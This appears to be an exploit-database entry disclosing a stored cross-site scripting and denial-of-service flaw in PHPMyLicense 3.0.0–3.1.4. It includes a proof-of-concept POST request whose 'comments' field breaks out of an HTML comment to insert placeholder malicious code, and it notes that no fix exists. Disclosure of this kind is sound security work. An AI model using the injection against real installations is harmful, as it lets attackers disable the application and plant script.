PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service

Author: Aria Akhavan Rezayat
type: dos
platform: php
port: 
date_added: 2015-11-10 
date_updated: 2015-11-10 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Hello, I want to report following exploit:


# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps

1.) Description:

Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.

2.) Proof of Concept:

localhost/phpmylicense/ajax/

POST:

comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing

3.) Solution:

None. - No Update available for it.